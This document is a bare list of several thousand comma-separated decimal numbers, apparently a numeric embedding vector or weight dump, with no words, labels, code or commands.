0.02327848970890045, -0.000044788524974137545, -0.04887879639863968, -0.01292076800018549, -0.04179272800683975, 0.014714900404214859, 0.003829492488875985, -0.011058789677917957, -0.0010450066765770316, -0.0006770399631932378, 0.016750259324908257, -0.021484356373548508, 0.01064417976886034, 0.02765074372291565, -0.02449970506131649, 0.001390829449519515, 0.03350051864981651, 0.0009625557577237487, 0.009264658205211163, 0.02204219624400139, -0.03618418052792549, -0.006403846200555563, 0.0006256847991608083, -0.04960247874259949, 0.019690224900841713, 0.022449268028140068, 0.03986290469765663, -0.017443791031837463, -0.005401242524385452, -0.021499434486031532, -0.022916646674275398, -0.008073595352470875, -0.007229297887533903, -0.01907207816839218, 0.006245540454983711, -0.011104020290076733, -0.017790555953979492, -0.023519717156887054, -0.008284669369459152, -0.007101145572960377, -0.019283153116703033, 0.010945714078843594, 0.019237922504544258, -0.007726829964667559, -0.00580454571172595, -0.02949010767042637, 0.0014030792517587543, 0.0081037487834692, 0.014993819408118725, -0.0028928497340530157, 0.0137952184304595, 0.016403494402766228, -0.015468737110495567, 0.005077092908322811, 0.02017267979681492, -0.037390321493148804, 0.01078740879893303, 0.01344845350831747, 0.0029230033978819847, -0.020881287753582, 0.007082299329340458, 0.027484899386763573, -0.00724060507491231, -0.002340664155781269, 0.0017696325667202473, -0.01567981205880642, -0.00022603334218729287, 0.00013039025361649692, 0.008314822800457478, -0.014217367395758629, -0.0009564307983964682, 0.01229508314281702, 0.006166387349367142, 0.009355118498206139, -0.01482043694704771, -0.009347580373287201, -0.008684203028678894, -0.026731062680482864, -0.013192148879170418, -0.009724498726427555, -0.0002537132822908461, 0.0081791328266263, 0.02070036716759205, -0.016418572515249252, 0.025389233604073524, -0.03138977661728859, 0.0139459865167737, 0.001871400629170239, -0.011767396703362465, 0.00989788118749857, 0.03410359099507332, 0.015363199636340141, -0.000508840021211654, 0.006547075230628252, 0.013621835969388485, 0.0006365212029777467, -0.019403766840696335, -0.028871960937976837, 0.026323990896344185, -0.022856339812278748, 0.010757255367934704, -0.006626227870583534, -0.0023670485243201256, 0.001819574274122715, -0.0037955697625875473, 0.0163281112909317, 0.013177072629332542, 0.024454474449157715, -0.0027722360100597143, -0.006226694211363792, 0.006577228661626577, -0.014285213313996792, -0.005815853364765644, -0.013116765767335892, 0.0003144914226140827, -0.016870874911546707, 0.02835935167968273, 0.01664472371339798, -0.01970530115067959, 0.006878763437271118, -0.009520962834358215, -0.028253814205527306, 0.004161180928349495, -0.030093176290392876, -0.014941050671041012, -0.0003387555480003357, 0.033802054822444916, -0.011398016475141048, -0.014865667559206486, 0.021499434486031532, -0.017187485471367836, -0.020971747115254402, 0.043782856315374374, -0.012672001495957375, -0.0026233531534671783, 0.013629375025629997, 0.040315207093954086, 0.007033300120383501, 0.02154466323554516, 0.008284669369459152, -0.015529043972492218, -0.017594557255506516, 0.004504176788032055, 0.01574011892080307, 0.003620302537456155, 0.0028871961403638124, -0.015250124037265778, -0.012950921431183815, -0.027138134464621544, 0.013071535155177116, -0.005005478393286467, 0.006509383209049702, 0.002442432101815939, -0.011835242621600628, 0.00713883712887764, 0.01298107486218214, -0.023489562794566154, -0.01664472371339798, -0.029128264635801315, -0.011970932595431805, -0.0007764521869830787, -0.002105090068653226, 0.007108683697879314, 0.014662131667137146, -0.0254043098539114, 0.0018129781819880009, 0.027695974335074425, 0.03488758206367493, -0.009128967300057411, 0.010696948505938053, -0.014307827688753605, 0.004338332451879978, 0.01895146444439888, 0.0026120455004274845, -0.01090802252292633, -0.0254344642162323, 0.024288630113005638, -0.014941050671041012, -0.005687701050192118, 0.019629918038845062, 0.007779598701745272, 0.004006644245237112, 0.00783990602940321, 0.005864852573722601, -0.029128264635801315, -0.028887037187814713, -0.011164327152073383, -0.0034940349869430065, -0.0029041573870927095, 0.015589350834488869, 0.00518262991681695, 0.011963394470512867, 0.0022916647139936686, 0.015785349532961845, -0.019584687426686287, -0.009030967950820923, 0.0036881479900330305, 0.004850941710174084, -0.0012287544086575508, 0.005672623869031668, -0.002596968784928322, -0.008375129662454128, -0.00824697781354189, -0.004994170740246773, -0.016855796799063683, -0.015815502032637596, 0.01580042578279972, 0.012099085375666618, 0.02327848970890045, -0.005815853364765644, 0.01531796995550394, 0.010146647691726685, -0.009716959670186043, -0.02140897326171398, 0.029942410066723824, 0.0016169805312529206, -0.0030586940702050924, 0.0018742274260148406, 0.015815502032637596, -0.03901860862970352, 0.007756983861327171, -0.011141711845993996, 0.012121700681746006, 0.003232076531276107, -0.004311948083341122, 0.0028871961403638124, 0.021424049511551857, 0.01201616320759058, 0.04459700360894203, 0.0042327954433858395, 0.008480667136609554, 0.012860461138188839, -0.00659230537712574, -0.01932838372886181, 0.0022238194942474365, 0.02952026017010212, 0.014368134550750256, -0.005167553201317787, 0.01200108602643013, -0.008827432058751583, 0.007119991350919008, -0.007945442572236061, -0.010832639411091805, 0.02926395647227764, -0.009332503192126751, 0.019554534927010536, -0.025042468681931496, 0.018634852021932602, -0.01708194799721241, -0.010900484398007393, -0.008458051830530167, -0.012491080909967422, 0.0007076645852066576, -0.021333590149879456, 0.006049542687833309, 0.008352515287697315, 0.007625062018632889, -0.022012043744325638, -0.03784262016415596, 0.00824697781354189, -0.0013003689236938953, 0.0047114817425608635, -0.011933241039514542, 0.019147461280226707, 0.00042285548988729715, 0.0074818329885602, 0.024348938837647438, 0.013056457974016666, -0.010742178186774254, 0.029188571497797966, -0.011202018707990646, -0.014956127852201462, -0.0059816972352564335, 0.00445894617587328, 0.0074818329885602, 0.0033338444773107767, 0.0005649066879414022, -0.0006902320892550051, -0.000944180937949568, -0.002672352595254779, -0.018725313246250153, -0.010342644527554512, -0.012136776931583881, -0.0018054398242384195, 0.00470017408952117, 0.0208511333912611, 0.0022049734834581614, 0.012845383957028389, 0.02362525463104248, 0.0160567294806242, 0.01179755013436079, -0.001756440382450819, 0.0037503396160900593, 0.004734097048640251, -0.006577228661626577, 0.027695974335074425, -0.01360675971955061, 0.021981889382004738, 0.0013870602706447244, -0.009324965067207813, 0.011616629548370838, 0.007444141432642937, -0.00995818804949522, 0.0032019231002777815, -0.005751776974648237, 0.02820858359336853, 0.0006793956854380667, 0.010689410381019115, -0.0013700989075005054, 0.003026655875146389, -0.005533164367079735, -0.01017680112272501, -0.031178701668977737, -0.009626499377191067, 0.0055859326384961605, -0.01359168253839016, -0.012151854112744331, -0.009573730640113354, -0.0038709533400833607, -0.0028909652028232813, 0.00453433021903038, -0.0008221535827033222, 0.0047567118890583515, 0.012596617452800274, 0.018469009548425674, 0.011277402751147747, 0.008593742735683918, -0.004142334684729576, 0.004779327195137739, 0.02154466323554516, 0.01570996455848217, 0.0024311246816068888, 0.02487662434577942, 0.016901027411222458, -0.007331065833568573, -0.0004928209818899632, -0.01938869059085846, 0.008910354226827621, -0.011820165440440178, 0.023580024018883705, -0.013154457323253155, -0.00741775706410408, -0.006893840152770281, 0.009950649924576283, -0.02032344788312912, 0.007248143665492535, 0.003833261551335454, 0.01243831217288971, 0.01461690105497837, -0.018152397125959396, -0.0008320476626977324, -0.0015679810894653201, -0.006166387349367142, -0.031239008530974388, 0.010485873557627201, 0.01126986462622881, -0.004813249688595533, -0.002559276996180415, -0.021740661934018135, 0.013614297844469547, 0.011963394470512867, -0.0004798644222319126, 0.00013710411440115422, -0.0025555077008903027, -0.011179404333233833, 0.004131027031689882, -0.016418572515249252, -0.00851082056760788, -0.008442975580692291, -0.006392538547515869, -0.012611694633960724, 0.02864580973982811, -0.01720256172120571, 0.010621564462780952, -0.01889115758240223, 0.009890343062579632, -0.009166658855974674, 0.0008928258321247995, 0.01985606923699379, 0.01058387290686369, -0.009347580373287201, -0.009166658855974674, -0.008654049597680569, -0.0036542252637445927, 0.02867596223950386, 0.0020334755536168814, 0.009347580373287201, -0.011360324919223785, -0.01907207816839218, -0.006701611913740635, 0.01857454515993595, 0.010350183583796024, -0.0008659703307785094, -0.006984300445765257, 0.014488749206066132, -0.009038507007062435, 0.0004584271810017526, 0.018680082634091377, 0.016418572515249252, 0.009324965067207813, 0.013101688586175442, -0.0020560906268656254, 0.011119097471237183, -0.000014060828107176349, -0.01929822936654091, -0.009505885653197765, 0.02160497009754181, -0.008201747201383114, 0.01340322382748127, -0.01264184806495905, 0.02116774581372738, -0.00019776444241870195, -0.008216824382543564, 0.0033036910463124514, -0.01483551412820816, 0.01813732087612152, 0.009988341480493546, -0.02908303402364254, -0.01228000596165657, -0.004605944734066725, -0.013757526874542236, 0.013923371210694313, -0.027605514973402023, -0.019629918038845062, -0.00395010644569993, -0.0019373613176867366, 0.0230674147605896, -0.02636922150850296, -0.009453116916120052, -0.011443247087299824, -0.021243128925561905, -0.02998763881623745, -0.006449076347053051, -0.00967926811426878, 0.024288630113005638, -0.013893217779695988, 0.016282880678772926, -0.00566508574411273, -0.017217639833688736, -0.022841263562440872, 0.009317426010966301, 0.029806718230247498, -0.010598949156701565, -0.01857454515993595, -0.010810024105012417, -0.003068116959184408, -0.009264658205211163, 0.006400076672434807, 0.006867455784231424, -0.005129861179739237, 0.00487732607871294, 0.0103652598336339, -0.0034356124233454466, -0.0076401387341320515, -0.03010825254023075, 0.006449076347053051, 0.012121700681746006, -0.00023015588521957397, 0.0034695351496338844, 0.007504448294639587, -0.015619504265487194, 0.012084008194506168, -0.0056839315220713615, 0.01175232045352459, 0.0071991439908742905, 0.007146375719457865, 0.028796575963497162, 0.007892674766480923, 0.02020283415913582, -0.009159120731055737, 0.02222311682999134, -0.0026516220532357693, 0.012619232758879662, -0.0017074410570785403, 0.00032956813811324537, -0.006362385116517544, -0.0162074975669384, 0.010229568928480148, 0.006622458808124065, -0.019087154418230057, 0.019268076866865158, 0.002947503002360463, -0.02324833534657955, 0.0042704869993031025, 0.008669126778841019, -0.00673176534473896, 0.025193234905600548, -0.006241770926862955, 0.016388418152928352, 0.009144043549895287, -0.012656924314796925, -0.010945714078843594, -0.0028645808342844248, 0.0060721575282514095, 0.012988612987101078, 0.019283153116703033, 0.011918164789676666, -0.0103652598336339, 0.001459617051295936, -0.007854982279241085, 0.0012551387771964073, -0.010116493329405785, -0.0009587865206412971, 0.020640060305595398, 0.008216824382543564, -0.004997939802706242, 0.022208040580153465, -0.008932969532907009, -0.013011228293180466, -0.011096482165157795, -0.012053854763507843, 0.0006826937315054238, -0.00925711914896965, -0.017353329807519913, 0.01476013008505106, 0.0005427626892924309, -0.010938175953924656, -0.009528500959277153, -0.00013368829968385398, -0.005695239175111055, -0.01078740879893303, -0.006580997724086046, -0.012860461138188839, -0.005951543804258108, -0.01649395562708378, 0.010131570510566235, 0.0010487758554518223, 0.018906233832240105, -0.0028118123300373554, 0.00004031261778436601, -0.052255988121032715, -0.01133017148822546, 0.011616629548370838, 0.0033545750193297863, -0.004930094350129366, 0.006238001864403486, -0.007854982279241085, -0.017971476539969444, 0.01221969909965992, -0.0003818655968643725, 0.015415968373417854, -0.006829764228314161, 0.0005323974182829261, 0.007907751016318798, -0.0161773432046175, 0.03540018945932388, -0.017775477841496468, -0.0074403719045221806, -0.015559197403490543, -0.0002049494651146233, 0.024861548095941544, 0.007930366322398186, -0.023338796570897102, 0.024952007457613945, -0.019494228065013885, -0.018031783401966095, 0.019840992987155914, -0.005020555108785629, -0.029791641980409622, 0.009407887235283852, 0.01365198940038681, -0.00947573222219944, -0.015001358464360237, -0.024243401363492012, 0.0010544296819716692, 0.023851405829191208, 0.014345520175993443, 0.025012314319610596, -0.0013898871839046478, -0.00002466166188241914, -0.0014737515011802316, 0.0069089168682694435, -0.027469823136925697, -0.019403766840696335, -0.008940507657825947, 0.04803450033068657, 0.013335377909243107, -0.007142606656998396, 0.004956478718668222, -0.002591314958408475, 0.008111286908388138, -0.0034808428026735783, -0.0036014567594975233, -0.034736812114715576, 0.02032344788312912, -0.00552562577649951, -0.00009629091073293239, -0.0010346414055675268, 0.00021661038044840097, 0.013749988749623299, -0.006705380976200104, -0.011262326501309872, -0.006750611122697592, 0.00535978190600872, -0.013734911568462849, -0.003032309701666236, 0.016313035041093826, 0.014767668209969997, 0.029897179454565048, 0.016750259324908257, 0.012996151112020016, 0.009015891700983047, -0.012973536737263203, -0.0073951417580246925, -0.014330442994832993, -0.01203124038875103, 0.013802757486701012, 0.024740932509303093, -0.011043713428080082, -0.0009055468253791332, -0.00731598911806941, 0.015725040808320045, -0.004164949990808964, 0.0028532734140753746, -0.0012579656904563308, 0.011639244854450226, 0.0055859326384961605, 0.002201204188168049, 0.013237379491329193, 0.02272064983844757, -0.010553719475865364, 0.0024235863238573074, 0.008812355808913708, 0.02163512445986271, -0.02403232641518116, -0.005273090209811926, -0.009709421545267105, 0.006437768694013357, -0.008608819916844368, 0.003953875508159399, 0.0009342868579551578, -0.002723236568272114, 0.003128423821181059, 0.0072594513185322285, 0.00008881143003236502, -0.000389168388210237, -0.021152669563889503, -0.00940034817904234, 0.008058518171310425, 0.02400217205286026, 0.012800153344869614, 0.016795489937067032, 0.014805360697209835, 0.024047402665019035, 0.007511986419558525, -0.016855796799063683, -0.005623624660074711, -0.0322340726852417, 0.008963122963905334, 0.00336588267236948, -0.0019769377540796995, -0.01139047835022211, 0.010689410381019115, 0.027665821835398674, -0.008254515938460827, 0.015513967722654343, 0.0127775389701128, -0.00925711914896965, -0.01611703634262085, -0.0062719243578612804, 0.0035072271712124348, 0.0065659210085868835, -0.0046210214495658875, -0.003147269831970334, -0.009113890118896961, -0.006366154178977013, 0.0019430151442065835, 0.01763978786766529, -0.01064417976886034, -0.003203807631507516, -0.0009715075721032917, -0.0017639787402004004, -0.017413636669516563, -0.02154466323554516, 0.018936388194561005, -0.010244646109640598, -0.005887467879801989, 0.014126907102763653, 0.013079073280096054, -0.006596074439585209, -0.015415968373417854, 0.009980803355574608, -0.003897337708622217, -0.014752591960132122, -0.00838266871869564, 0.015559197403490543, 0.010267261415719986, -0.015129510313272476, 0.021906506270170212, 0.01889115758240223, -0.004681328311562538, 0.015272739343345165, -0.018649930134415627, -0.003426189534366131, -0.001447367249056697, 0.01003357209265232, 0.0044212546199560165, 0.02210250310599804, -0.022343730553984642, -0.004161180928349495, -0.010764793492853642, -0.01766994222998619, -0.0019317074911668897, -0.015174740925431252, -0.00995818804949522, 0.0038784919306635857, -0.003953875508159399, -0.005209014285355806, 0.020278217270970345, -0.0012843499425798655, -0.0024179324973374605, -0.013297686353325844, -0.020217910408973694, -0.03407343477010727, 0.013471068814396858, 0.006060850340873003, -0.0011401786468923092, -0.008442975580692291, -0.02222311682999134, -0.01223477628082037, -0.011224634014070034, 0.014006293378770351, 0.0018582084449008107, -0.003582610748708248, 0.0011251018149778247, -0.005050708539783955, 0.016313035041093826, -0.0041272579692304134, 0.03796323761343956, 0.03138977661728859, 0.006302078254520893, -0.008872662670910358, -0.0036523407325148582, 0.005774392280727625, 0.005589702166616917, 0.00751952501013875, -0.014669669792056084, -0.0002065984735963866, 0.02867596223950386, 0.01092309970408678, 0.016132114455103874, 0.005103477276861668, -0.005623624660074711, -0.0002911695628426969, 0.024454474449157715, 0.010131570510566235, 0.012362928129732609, 0.003267883788794279, -0.010478335432708263, 0.024318784475326538, -0.0052957055158913136, -0.015921039506793022, -0.016071807593107224, -0.02642952837049961, 0.015664733946323395, 0.01748901978135109, 0.008111286908388138, -0.004059412516653538, 0.0004435860028024763, 0.015287816524505615, -0.0044137160293757915, 0.010191877372562885, -0.011699551716446877, -0.010199415497481823, -0.008360053412616253, -0.002178589114919305, 0.001287176855839789, 0.006637535523623228, 0.02599230222404003, -0.024333860725164413, 0.013297686353325844, -0.007293373811990023, -0.011006021872162819, -0.013614297844469547, 0.0013060227502137423, -0.004372254945337772, -0.0006157906609587371, 0.018785620108246803, -0.02531384862959385, -0.011541245505213737, -0.013832910917699337, 0.002465047175064683, 0.010802485048770905, 0.018680082634091377, -0.005235398653894663, 0.022675419226288795, 0.0017470174934715033, -0.00949080940335989, -0.003222653642296791, -0.02119789831340313, -0.022946801036596298, -0.03316883370280266, -0.0030247713439166546, 0.020896364003419876, -0.008427898399531841, -0.024982161819934845, -0.01699148863554001, -0.0006431172951124609, -0.0015915385447442532, -0.0010459489421918988, -0.004195103421807289, -0.021921582520008087, -0.02849504165351391, 0.0011835242621600628, -0.0021653969306498766, -0.0002706746163312346, -0.023821251466870308, 0.036546021699905396, -0.009121429175138474, -0.015076741576194763, 0.020489292219281197, -0.008292208425700665, -0.021921582520008087, 0.010214492678642273, 0.011669398285448551, -0.002044783206656575, -0.017685018479824066, -0.027077827602624893, -0.012264929711818695, -0.0012400620616972446, -0.012566464021801949, -0.004131027031689882, -0.0046662515960633755, 0.016433648765087128, -0.020504368469119072, -0.010372797958552837, -0.013840449042618275, 0.009204350411891937, -0.00009994230640586466, 0.03443527966737747, 0.0033903822768479586, 0.00511855399236083, 0.0056387013755738735, -0.01010141707956791, -0.030590709298849106, -0.004229025915265083, -0.01564965769648552, -0.014405827037990093, 0.0028306583408266306, -0.013538913801312447, -0.014729976654052734, -0.011337709613144398, 0.037510935217142105, 0.005559548735618591, -0.0160868838429451, 0.02456001192331314, 0.001402136986143887, -0.020986825227737427, -0.006121157202869654, 0.014858129434287548, -0.004628559574484825, 0.0010101416846737266, 0.011970932595431805, 0.0003740916436072439, -0.0030568093061447144, -0.015212432481348515, -0.006807148922234774, 0.0015698657371103764, -0.026414452120661736, -0.021981889382004738, -0.027605514973402023, -0.005337166599929333, -0.027816588059067726, 0.004530560690909624, 0.0025253542698919773, 0.02026314102113247, 0.011948318220674992, -0.011646782979369164, 0.0018374779028818011, 0.018680082634091377, 0.012491080909967422, -0.005838468205183744, 0.015091818757355213, 0.013900755904614925, 0.0063699232414364815, -0.010516026988625526, -0.012302621267735958, -0.027198441326618195, 0.016433648765087128, -0.006980531383305788, -0.004319486673921347, 0.003486496629193425, -0.024258477613329887, 0.0008230958483181894, 0.0058836983516812325, -0.0046134828589856625, 0.017685018479824066, -0.014624439179897308, -0.029625797644257545, -0.0036353792529553175, -0.015355661511421204, 0.01932838372886181, 0.01629795879125595, 0.0007175586652010679, 0.013003690168261528, -0.0035675340332090855, -0.022012043744325638, -0.00885004736483097, 0.006158849224448204, 0.031811926513910294, -0.002374586882069707, -0.029128264635801315, 0.006222925148904324, -0.018589623272418976, 0.019343459978699684, 0.0026817754842340946, -0.0016669222386553884, -0.022298501804471016, -0.004964017309248447, 0.0002883426786866039, 0.006200309842824936, -0.003473304444923997, 0.0004909363924525678, 0.017277946695685387, 0.010116493329405785, -0.01953945681452751, 0.0019251115154474974, 0.02514800615608692, -0.003799338825047016, 0.03013840690255165, 0.00586862163618207, -0.004131027031689882, -0.0016207497101277113, 0.012898152694106102, 0.01203124038875103, -0.009468194097280502, 0.005830930080264807, -0.006381230894476175, -0.019554534927010536, -0.003060578601434827, 0.0032056921627372503, -0.014669669792056084, 0.01717240922152996, 0.005261783022433519, -0.02041390910744667, -0.005521856714040041, -0.008797278627753258, 0.0052957055158913136, 0.019554534927010536, -0.01577027142047882, 0.01770009472966194, -0.003776723751798272, 0.015385814942419529, 0.015235047787427902, -0.014707361347973347, 0.011541245505213737, -0.009324965067207813, 0.0017658633878454566, -0.011141711845993996, 0.015091818757355213, -0.018152397125959396, -0.008601280860602856, -0.010372797958552837, -0.00580454571172595, -0.018634852021932602, 0.0012664463138207793, -0.03772200644016266, 0.02388155832886696, -0.00995818804949522, -0.012649386189877987, 0.005401242524385452, -0.016418572515249252, -0.006158849224448204, 0.003501573344692588, -0.04830588027834892, 0.008887738920748234, -0.01564965769648552, 0.00435717822983861, 0.025178158655762672, 0.012212160974740982, -0.010938175953924656, 0.004402408376336098, -0.007960519753396511, -0.010960791260004044, 0.01195585634559393, 0.0028721194248646498, 0.006799610331654549, 0.014420903287827969, -0.0185443926602602, -0.021620048210024834, -0.003175538731738925, 0.00012226295075379312, -0.02082098089158535, 0.014827976003289223, 0.004587098490446806, -0.04372255131602287, 0.00027091021183878183, 0.0029795411974191666, -0.0068109179846942425, 0.01200108602643013, -0.0023142797872424126, -0.01783578470349312, -0.010727101936936378, 0.025886764749884605, -0.010500950738787651, -0.004244102630764246, 0.0030718862544745207, 0.00566508574411273, 0.003343267599120736, -0.0075006792321801186, -0.005167553201317787, 0.007285835687071085, 0.015619504265487194, -0.0081791328266263, -0.00001529759174445644, 0.0068109179846942425, 0.0138706024736166, -0.023821251466870308, 0.017775477841496468, -0.0026478527579456568, 0.033741749823093414, -0.0015415968373417854, -0.003262229962274432, -0.017805632203817368, 0.010900484398007393, -0.0016574993496760726, 0.0010148531291633844, 0.008171593770384789, -0.016222573816776276, -0.009528500959277153, -0.007922828197479248, -0.002169166225939989, -0.013719835318624973, 0.0031510391272604465, 0.01502397283911705, -0.007368757389485836, -0.005706546828150749, -0.00501678604632616, 0.019192691892385483, 0.013501222245395184, -0.010010956786572933, 0.0031623465474694967, 0.013689681887626648, 0.03322913870215416, 0.012837845832109451, 0.005050708539783955, -0.009151582606136799, -0.01670503057539463, 0.006596074439585209, -0.02820858359336853, 0.006275693885982037, 0.006437768694013357, -0.0055934712290763855, 0.021951736882328987, -0.0028005046769976616, 0.009732036851346493, -0.002186127472668886, -0.012061393819749355, 0.001889304257929325, -0.0024009710177779198, 0.014081676490604877, 0.009234504774212837, 0.0028080432675778866, -0.004443869460374117, -0.000603540800511837, -0.009136505424976349, -0.03567156940698624, -0.0008183844038285315, -0.011480938643217087, -0.0002454681962262839, -0.015076741576194763, 0.0011722167255356908, 0.007719291839748621, 0.007719291839748621, 0.02814827673137188, 0.01708194799721241, -0.012204622849822044, 0.009226965717971325, 0.017262868583202362, 0.007930366322398186, -0.0011712743435055017, 0.014473672024905682, 0.014390749856829643, 0.018031783401966095, 0.008442975580692291, 0.00673176534473896, 0.003897337708622217, 0.010990944691002369, -0.01904192566871643, -0.007711753249168396, 0.0010026033269241452, -0.003128423821181059, -0.01344845350831747, 0.010304952971637249, 0.019584687426686287, -0.0017328830435872078, 0.0032754221465438604, -0.0018723428947851062, -0.02820858359336853, 0.005518087651580572, 0.006464153062552214, 0.00022685785370413214, 0.004519253503531218, -0.017971476539969444, 0.0028118123300373554, -0.016780413687229156, 0.005781930405646563, 0.011857856996357441, -0.015996422618627548, -0.000179625247255899, 0.015197355300188065, -0.005732931196689606, -0.000984699698165059, 0.0016216920921579003, -0.008329899981617928, 0.009166658855974674, 0.0073574502021074295, 0.018438855186104774, -0.00001833060923672747, -0.0014775206800550222, 0.009920496493577957, 0.0126267708837986, 0.002702506026253104, -0.00590631365776062, -0.01477520726621151, -0.0007378180744126439, 0.020609905943274498, -0.0013295802054926753, -0.010357721708714962, 0.001642422517761588, -0.01611703634262085, 0.004564483650028706, -0.003049270948395133, -0.001791305374354124, 0.0070144543424248695, 0.008360053412616253, 0.040194593369960785, 0.0063699232414364815, 0.0008188555366359651, -0.009784805588424206, 0.027695974335074425, -0.0042704869993031025, -0.02029329538345337, -0.006682765670120716, 0.00000817147611087421, 0.00028480906621553004, 0.0017517289379611611, -0.008337438106536865, -0.017293022945523262, 0.010146647691726685, 0.006984300445765257, -0.018303165212273598, 0.014601824805140495, -0.0026233531534671783, 0.006158849224448204, 0.001567038823850453, 0.015001358464360237, 0.018634852021932602, -0.012151854112744331, 0.011217095889151096, -0.007681599818170071, -0.001041237497702241, 0.0007462986977770925, 0.002649737289175391, -0.013229841366410255, -0.00026808332768268883, -0.012378005310893059, 0.018499162048101425, -0.02920364961028099, 0.0067129191011190414, 0.02122805267572403, -0.018529316410422325, -0.018318241462111473, -0.020187757909297943, -0.01448121014982462, 0.004455177113413811, -0.003968952223658562, 0.031781770288944244, -0.009905419312417507, 0.01340322382748127, 0.008186670951545238, -0.0005163783789612353, 0.005352243315428495, 0.009769728407263756, -0.002169166225939989, -0.0028909652028232813, -0.010229568928480148, -0.0017234600381925702, -0.0019024963257834315, -0.015725040808320045, -0.003113347105681896, -0.008752048946917057, 0.029776565730571747, 0.012883075512945652, 0.02041390910744667, -0.017624711617827415, -0.017941322177648544, -0.018469009548425674, -0.018031783401966095, -0.01385552529245615, 0.007338603958487511, 0.018680082634091377, 0.00015488995995838195, -0.00832236185669899, -0.013825371861457825, -0.011164327152073383, 0.01892131008207798, 0.006015620194375515, -0.008465590886771679, -0.015091818757355213, -0.018288087099790573, 0.0014285212382674217, 0.016599493101239204, 0.002694967668503523, 0.027756281197071075, 0.008171593770384789, -0.026384297758340836, -0.003889799350872636, -0.0369078628718853, 0.0032000383362174034, 0.005167553201317787, -0.009701883420348167, -0.00878974050283432, 0.0024631626438349485, -0.025735998526215553, 0.020805902779102325, -0.0025423155166208744, -0.017790555953979492, 0.0023086261935532093, 0.002534777158871293, -0.002003322122618556, 0.0041272579692304134, -0.0010026033269241452, 0.006603613030165434, 0.017865939065814018, -0.011820165440440178, -0.021951736882328987, 0.004798172973096371, 0.008284669369459152, 0.004639867227524519, 0.020127451047301292, -0.014888282865285873, 0.013531375676393509, 0.009588807821273804, 0.01139047835022211, -0.00014652709069196135, -0.007809752132743597, -0.019026847556233406, 0.011986009776592255, 0.0031793080270290375, 0.011744781397283077, 0.010056186467409134, -0.007070991676300764, 0.01003357209265232, 0.016569338738918304, 0.0009658537455834448, 0.0075006792321801186, 0.009279734455049038, -0.0370284765958786, -0.005005478393286467, 0.016840720549225807, -0.009279734455049038, 0.014375673606991768, -0.009324965067207813, -0.015619504265487194, 0.003559995675459504, 0.0018016706453636289, 0.019644994288682938, 0.006588536314666271, 0.00036890903720632195, -0.006407615263015032, -0.021122515201568604, -0.011262326501309872, -0.009483270347118378, -0.016976410523056984, 0.0016009615501388907, 0.013523837551474571, 0.007285835687071085, 0.0069164554588496685, 0.004093335475772619, 0.0030172329861670732, -0.00003713236583280377, -0.0035298422444611788, 0.021680355072021484, -0.003026655875146389, 0.006580997724086046, -0.0036655329167842865, 0.007018223404884338, 0.01530289277434349, -0.010614026337862015, -0.012099085375666618, -0.0016603261465206742, -0.006709150038659573, 0.0023557408712804317, -0.007726829964667559, -0.011149250902235508, 0.004560714587569237, -0.018680082634091377, 0.012852922081947327, -0.021243128925561905, 0.007485602516680956, 0.0019957837648689747, 0.012619232758879662, 0.02175573818385601, 0.014873205684125423, 0.003593918401747942, 0.006234232801944017, 0.009347580373287201, 0.011352786794304848, 0.0005568971391767263, 0.0018101512687280774, -0.0038464537356048822, -0.014111829921603203, 0.014692285098135471, -0.00024476146791130304, 0.012845383957028389, 0.010712024755775928, -0.013538913801312447, -0.010900484398007393, -0.006381230894476175, -0.0011203903704881668, -0.006019389256834984, 0.009709421545267105, 0.01203124038875103, 0.018182551488280296, 0.010945714078843594, 0.026127994060516357, -0.0025498538743704557, -0.004990401677787304, 0.02272064983844757, 0.0163582656532526, 0.0060721575282514095, -0.0023482025135308504, 0.01857454515993595, 0.010146647691726685, 0.01385552529245615, 0.012355390004813671, -0.014684746041893959, 0.018227780237793922, 0.0013135611079633236, -0.011857856996357441, 0.00033027486642822623, -0.011179404333233833, -0.025826457887887955, 0.0047190203331410885, -0.02300710789859295, 0.02665567956864834, 0.023429255932569504, 0.025359079241752625, -0.002150320215150714, -0.006068388465791941, 0.006803379859775305, 0.0004501820949371904, 0.0054427036084234715, -0.027530129998922348, -0.009332503192126751, -0.023459410294890404, 0.004176257643848658, -0.003318767761811614, -0.013342916034162045, 0.009814959019422531, 0.0025762382429093122, 0.006709150038659573, -0.006645074114203453, 0.0004890518030151725, -0.010116493329405785, 0.02578122913837433, 0.02581138163805008, -0.0042252568528056145, 0.008706818334758282, 0.005864852573722601, -0.03169131278991699, 0.005186398979276419, -0.01763978786766529, 0.03033440373837948, -0.0004322784661781043, -0.024243401363492012, -0.003605225821956992, 0.01433798111975193, -0.017323175445199013, -0.011217095889151096, 0.0007439429755322635, -0.023384027183055878, 0.01455659419298172, 0.0068636867217719555, -0.0019543226808309555, 0.0027138134464621544, 0.00017844737158156931, -0.010802485048770905, 0.008932969532907009, 0.01705179549753666, -0.004997939802706242, 0.00783990602940321, -0.006426461040973663, 0.0005215610144659877, -0.00552562577649951, 0.008910354226827621, 0.014594285748898983, -0.010478335432708263, 0.034586045891046524, -0.008608819916844368, -0.005356012377887964, -0.017881015315651894, -0.002613930031657219, -0.007960519753396511, 0.018092090263962746, -0.0017950745532289147, 0.01646380126476288, -0.007289604749530554, 0.0006732707261107862, -0.008397744968533516, 0.013003690168261528, -0.011827703565359116, -0.02250957489013672, 0.0018101512687280774, -0.015619504265487194, 0.0028344274032860994, 0.001671633799560368, 0.009279734455049038, -0.025163082405924797, -0.0163582656532526, -0.006200309842824936, -0.0018977848812937737, 0.0070069157518446445, 0.0011995432432740927, -0.002866465598344803, 0.027349209412932396, 0.03292760252952576, 0.00439487025141716, 0.009995879605412483, 0.0018299395451322198, -0.0029550413601100445, -0.008608819916844368, -0.002791081788018346, -0.019644994288682938, -0.010395413264632225, 0.01982591487467289, 0.018242858350276947, -0.004036797676235437, 0.006792072206735611, 0.001361618284136057, -0.002140897326171398, 0.008940507657825947, -0.003416766645386815, 0.012400619685649872, 0.002596968784928322, 0.015046588145196438, 0.013659528456628323, -0.007436602842062712, 0.013900755904614925, -0.014925974421203136, -0.011006021872162819, 0.004202641546726227, 0.014594285748898983, -0.005084631033241749, 0.020866211503744125, 0.0012673885794356465, -0.0047567118890583515, 0.005895006004720926, 0.004564483650028706, -0.005028093233704567, -0.0002772707084659487, 0.010998482815921307, 0.024710780009627342, 0.016855796799063683, 0.021107438951730728, -0.006535767577588558, -0.012151854112744331, 0.006343539338558912, 0.00830728467553854, -0.0023105107247829437, 0.00783990602940321, 0.01042556669563055, -0.009498347528278828, 0.004617252387106419, -0.007960519753396511, 0.020278217270970345, 0.002385894302278757, -0.001773401745595038, -0.006381230894476175, -0.016313035041093826, 